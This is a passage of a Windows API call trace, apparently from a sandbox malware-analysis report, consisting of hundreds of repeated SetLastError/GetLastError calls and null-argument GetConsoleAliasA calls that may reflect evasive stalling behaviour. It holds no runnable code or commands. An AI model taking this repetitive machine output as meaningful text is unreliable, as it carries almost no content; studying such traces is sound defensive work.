(dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.660] SetLastError (dwErrCode=0x0) [0056.660] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.661] SetLastError (dwErrCode=0x0) [0056.661] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.662] SetLastError (dwErrCode=0x0) [0056.662] GetLastError () returned 0x0 [0056.663] SetLastError (dwErrCode=0x0) [0056.663] GetLastError () returned 0x0 [0056.663] SetLastError (dwErrCode=0x0) [0056.663] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.663] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.663] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.663] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.664] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.665] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.666] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.667] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.668] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, 